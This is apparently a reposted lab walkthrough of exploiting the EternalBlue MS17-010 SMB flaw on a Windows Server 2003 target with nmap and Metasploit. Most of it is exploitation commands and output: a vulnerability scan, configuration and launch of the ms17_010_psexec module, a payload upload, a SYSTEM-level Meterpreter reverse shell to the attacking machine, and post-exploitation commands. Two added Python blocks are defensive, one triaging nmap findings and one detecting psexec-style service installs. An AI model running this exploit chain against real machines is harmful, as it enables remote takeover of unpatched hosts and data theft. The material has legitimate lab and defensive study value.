EternalBlue MS17-010 exploitation and attack (CVE-2017-0146)

Introduction

EternalBlue (永恒之蓝) broke out on the evening of 14 April 2017. It exploits a vulnerability in the SMB protocol of Windows systems to obtain the highest system privileges and thereby take control of the compromised computer. Worse still, on 12 May 2017 criminals reworked EternalBlue into the WannaCry ransomware, which spread across the world on a massive scale, reaching schools, large enterprises, government bodies and other organisations; victims could only recover their files by paying a hefty ransom. Not long after the malware appeared, however, Microsoft fixed the flaw with a patch.

Lab environment

Attack machine: kali linux       192.168.1.106
Target machine: win2003          192.168.1.103

Exploitation and attack

First, we can use nmap to scan for vulnerabilities that may be present:

msf5 > nmap --script=vuln 192.168.1.103
[*] exec: nmap --script=vuln 192.168.1.103

Starting Nmap 7.70 ( https://nmap.org ) at 2020-08-29 13:52 CST
Nmap scan report for 192.168.1.103
Host is up (0.00051s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
MAC Address: 00:0C:29:FE:8D:2D (VMware)

Host script results:
| smb-vuln-ms08-067: 
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|           The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
|           Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
|           code via a crafted RPC request that triggers the overflow during path canonicalization.
|           
|     Disclosure date: 2008-10-23
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_      https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143

Nmap done: 1 IP address (1 host up) scanned in 23.40 seconds
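The host-script block above is the part worth keeping for patch triage. As an added example that is not part of the original post, the following Python parses nmap's NSE host-script output (the '| name:' / '|_name:' layout shown above), records each script's State and CVE IDs, and lists the checks that came back VULNERABLE; the input is the scan output above, embedded as a constructed sample.

```python
import re

# Constructed sample: the "Host script results" block from the nmap run above, trimmed.
NMAP_OUTPUT = """\
Host script results:
| smb-vuln-ms08-067: 
|     State: VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
| smb-vuln-ms17-010: 
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
"""

# A script header is '| name:' or '|_name:' (at most one space before the name);
# indented detail lines such as '|     State: VULNERABLE' do not match it.
SCRIPT_HEADER = re.compile(r"^\|_? ?([\w-]+):\s*(.*)$")
STATE = re.compile(r"State:\s*(\w+)")
CVE = re.compile(r"CVE-\d{4}-\d{4,}")

def parse_host_scripts(text):
    """Return {script_name: {'state': str|None, 'cves': [...]}} per NSE host script."""
    results, current = {}, None
    for line in text.splitlines():
        header = SCRIPT_HEADER.match(line)
        if header:
            current = header.group(1)
            # One-line scripts ('|_smb-vuln-ms10-054: false') carry their result inline.
            results[current] = {"state": header.group(2).strip() or None, "cves": []}
        elif current and line.startswith("|"):
            entry = results[current]
            state = STATE.search(line)
            if state:
                entry["state"] = state.group(1)
            for cve in CVE.findall(line):  # IDs line and reference URLs, deduplicated
                if cve not in entry["cves"]:
                    entry["cves"].append(cve)
        else:
            current = None  # any non-'|' line ends the host-script block
    return results

def vulnerable_findings(text):
    """(script, cves) pairs nmap reported as State: VULNERABLE, for patch triage."""
    found = parse_host_scripts(text).items()
    return [(name, r["cves"]) for name, r in found if r["state"] == "VULNERABLE"]
```

On the sample, vulnerable_findings(NMAP_OUTPUT) returns the MS08-067 and MS17-010 entries with CVE-2008-4250 and CVE-2017-0143, while MS10-054 (false) and MS10-061 are skipped.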

We can see that MS17-010 is present, so we can verify it further.
Search for ms17-010:

msf5 > search ms17-010

Matching Modules
================

   #  Name                                           Disclosure Date  Rank     Check  Description
   -  ----                                           ---------------  ----     -----  -----------
   1  auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   2  auxiliary/scanner/smb/smb_ms17_010                              normal   Yes    MS17-010 SMB RCE Detection
   3  exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   4  exploit/windows/smb/ms17_010_eternalblue_win8  2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
   5  exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution

Select the auxiliary scanner module to probe for the vulnerability:

msf5 > use auxiliary/scanner/smb/smb_ms17_010
msf5 auxiliary(scanner/smb/smb_ms17_010) > options 

Module options (auxiliary/scanner/smb/smb_ms17_010):

   Name         Current Setting                                                 Required  Description
   ----         ---------------                                                 --------  -----------
   CHECK_ARCH   true                                                            no        Check for architecture on vulnerable hosts
   CHECK_DOPU   true                                                            no        Check for DOUBLEPULSAR on vulnerable hosts
   CHECK_PIPE   false                                                           no        Check for named pipe on vulnerable hosts
   NAMED_PIPES  /usr/share/metasploit-framework/data/wordlists/named_pipes.txt  yes       List of named pipes to check
   RHOSTS                                                                       yes       The target address range or CIDR identifier
   RPORT        445                                                             yes       The SMB service port (TCP)
   SMBDomain    .                                                               no        The Windows domain to use for authentication
   SMBPass                                                                      no        The password for the specified username
   SMBUser                                                                      no        The username to authenticate as
   THREADS      1                                                               yes       The number of concurrent threads

Every option marked yes under Required must be filled in. Only RHOSTS (the address to scan) is missing; set it as follows:

msf5 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.1.103
RHOSTS => 192.168.1.103
msf5 auxiliary(scanner/smb/smb_ms17_010) > options 

Module options (auxiliary/scanner/smb/smb_ms17_010):

   Name         Current Setting                                                 Required  Description
   ----         ---------------                                                 --------  -----------
   CHECK_ARCH   true                                                            no        Check for architecture on vulnerable hosts
   CHECK_DOPU   true                                                            no        Check for DOUBLEPULSAR on vulnerable hosts
   CHECK_PIPE   false                                                           no        Check for named pipe on vulnerable hosts
   NAMED_PIPES  /usr/share/metasploit-framework/data/wordlists/named_pipes.txt  yes       List of named pipes to check
   RHOSTS       192.168.1.103                                                   yes       The target address range or CIDR identifier
   RPORT        445                                                             yes       The SMB service port (TCP)
   SMBDomain    .                                                               no        The Windows domain to use for authentication
   SMBPass                                                                      no        The password for the specified username
   SMBUser                                                                      no        The username to authenticate as
   THREADS      1                                                               yes       The number of concurrent threads

run or exploit: launch the module

msf5 auxiliary(scanner/smb/smb_ms17_010) > exploit 

[+] 192.168.1.103:445     - Host is likely VULNERABLE to MS17-010! - Windows Server 2003 3790 Service Pack 2 x86 (32-bit)
[*] 192.168.1.103:445     - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

The MS17-010 vulnerability is present, so we set up the exploit module:

msf5 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_psexec
msf5 exploit(windows/smb/ms17_010_psexec) > options 

Module options (exploit/windows/smb/ms17_010_psexec):

   Name                  Current Setting                                                 Required  Description
   ----                  ---------------                                                 --------  -----------
   DBGTRACE              false                                                           yes       Show extra debug trace info
   LEAKATTEMPTS          99                                                              yes       How many times to try to leak transaction
   NAMEDPIPE                                                                             no        A named pipe that can be connected to (leave blank for auto)
   NAMED_PIPES           /usr/share/metasploit-framework/data/wordlists/named_pipes.txt  yes       List of named pipes to check
   RHOSTS                                                                                yes       The target address range or CIDR identifier
   RPORT                 445                                                             yes       The Target port
   SERVICE_DESCRIPTION                                                                   no        Service description to to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                                                                  no        The service display name
   SERVICE_NAME                                                                          no        The service name
   SHARE                 ADMIN$                                                          yes       The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
   SMBDomain             .                                                               no        The Windows domain to use for authentication
   SMBPass                                                                               no        The password for the specified username
   SMBUser                                                                               no        The username to authenticate as


Exploit target:

   Id  Name
   --  ----
   0   Automatic

Same steps as before: the target address still has to be set:

msf5 exploit(windows/smb/ms17_010_psexec) > set RHOSTS 192.168.1.103
RHOSTS => 192.168.1.103
msf5 exploit(windows/smb/ms17_010_psexec) > options 

Module options (exploit/windows/smb/ms17_010_psexec):

   Name                  Current Setting                                                 Required  Description
   ----                  ---------------                                                 --------  -----------
   DBGTRACE              false                                                           yes       Show extra debug trace info
   LEAKATTEMPTS          99                                                              yes       How many times to try to leak transaction
   NAMEDPIPE                                                                             no        A named pipe that can be connected to (leave blank for auto)
   NAMED_PIPES           /usr/share/metasploit-framework/data/wordlists/named_pipes.txt  yes       List of named pipes to check
   RHOSTS                192.168.1.103                                                   yes       The target address range or CIDR identifier
   RPORT                 445                                                             yes       The Target port
   SERVICE_DESCRIPTION                                                                   no        Service description to to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                                                                  no        The service display name
   SERVICE_NAME                                                                          no        The service name
   SHARE                 ADMIN$                                                          yes       The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
   SMBDomain             .                                                               no        The Windows domain to use for authentication
   SMBPass                                                                               no        The password for the specified username
   SMBUser                                                                               no        The username to authenticate as


Exploit target:

   Id  Name
   --  ----
   0   Automatic

Once it is configured, launch it:

msf5 exploit(windows/smb/ms17_010_psexec) > run

[*] Started reverse TCP handler on 192.168.1.100:4444 
[*] 192.168.1.103:445 - Target OS: Windows Server 2003 3790 Service Pack 2
[*] 192.168.1.103:445 - Filling barrel with fish... done
[*] 192.168.1.103:445 - <---------------- | Entering Danger Zone | ---------------->
[*] 192.168.1.103:445 - 	[*] Preparing dynamite...
[*] 192.168.1.103:445 - 		Trying stick 1 (x64)...Miss
[*] 192.168.1.103:445 - 		[*] Trying stick 2 (x86)...Boom!
[*] 192.168.1.103:445 - 	[+] Successfully Leaked Transaction!
[*] 192.168.1.103:445 - 	[+] Successfully caught Fish-in-a-barrel
[*] 192.168.1.103:445 - <---------------- | Leaving Danger Zone | ---------------->
[*] 192.168.1.103:445 - Reading from CONNECTION struct at: 0x90670b08
[*] 192.168.1.103:445 - Built a write-what-where primitive...
[+] 192.168.1.103:445 - Overwrite complete... SYSTEM session obtained!
[*] 192.168.1.103:445 - Selecting native target
[*] 192.168.1.103:445 - Uploading payload... eqCoYHQN.exe
[*] 192.168.1.103:445 - Created \eqCoYHQN.exe...
[+] 192.168.1.103:445 - Service started successfully...
[*] 192.168.1.103:445 - Deleting \eqCoYHQN.exe...
[-] 192.168.1.103:445 - Delete of \eqCoYHQN.exe failed: The server responded with error: STATUS_CANNOT_DELETE (Command=6 WordCount=0)
[*] Sending stage (179779 bytes) to 192.168.1.103
[*] Meterpreter session 1 opened (192.168.1.100:4444 -> 192.168.1.103:1029) at 2020-08-29 14:16:13 +0800
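From the defender's side, the run above leaves clear host artefacts: a new service was installed whose executable (eqCoYHQN.exe) was dropped directly into the ADMIN$ share, which is the Windows directory, and the delete failed with STATUS_CANNOT_DELETE, so the binary is still on disk. The following detection, an added example that is not from the original post, scans Windows System log service-installation events (Event ID 7045) for that pattern; the log lines are constructed in a simplified key=value rendering with assumed field names (EventID, ServiceName, ImagePath, ServiceAccount).

```python
import re

# Constructed sample: Windows System log events rendered as simplified key=value
# lines. Event ID 7045 is "A service was installed in the system"; the second
# line mirrors the artefact the run above created (eqCoYHQN.exe dropped on ADMIN$).
SAMPLE_LOG = r"""
2020-08-29 09:00:01 EventID=7045 ServiceName=WdNisSvc ImagePath="C:\Program Files\Windows Defender\NisSrv.exe" ServiceAccount=LocalService
2020-08-29 14:16:12 EventID=7045 ServiceName=eqCoYHQN ImagePath=%SystemRoot%\eqCoYHQN.exe ServiceAccount=LocalSystem
2020-08-29 14:16:13 EventID=7036 ServiceName=eqCoYHQN State=running
2020-08-29 14:20:00 EventID=7045 ServiceName=Spooler ImagePath=%SystemRoot%\System32\spoolsv.exe ServiceAccount=LocalSystem
"""

FIELD = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')

# ADMIN$ is the Windows directory, so the dropped payload lands directly in
# %SystemRoot% with an 8-letter random name, never in a subfolder.
RANDOM_EXE_IN_WINROOT = re.compile(
    r"^(?:%SystemRoot%|C:\\Windows)\\[A-Za-z]{8}\.exe$", re.IGNORECASE)

def parse_event(line):
    """Split one log line into its key=value fields plus the leading timestamp."""
    fields = {k: quoted or bare for k, quoted, bare in FIELD.findall(line)}
    fields["ts"] = line[:19]
    return fields

def suspicious_service_installs(log_text):
    """Return (timestamp, service name, image path, reasons) for 7045 events that
    match the psexec-style install seen above; ordinary service installs pass."""
    findings = []
    for line in log_text.strip().splitlines():
        ev = parse_event(line)
        if ev.get("EventID") != "7045":
            continue
        reasons = []
        path = ev.get("ImagePath", "")
        if RANDOM_EXE_IN_WINROOT.match(path):
            reasons.append("random 8-letter executable directly in the Windows directory")
            if ev.get("ServiceAccount") == "LocalSystem":
                reasons.append("service runs as LocalSystem")
        if reasons:
            findings.append((ev["ts"], ev.get("ServiceName"), path, reasons))
    return findings

if __name__ == "__main__":
    for ts, name, path, reasons in suspicious_service_installs(SAMPLE_LOG):
        print(ts, name, path, "; ".join(reasons))
```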

We can see that a session has been established. From here we can:

Show the remote host's system information: sysinfo
Check the current user identity: getuid
Take a screenshot of the remote host's current screen: screenshot
Get a shell console: shell
...

Reposted from blog.csdn.net/p_utao/article/details/108293665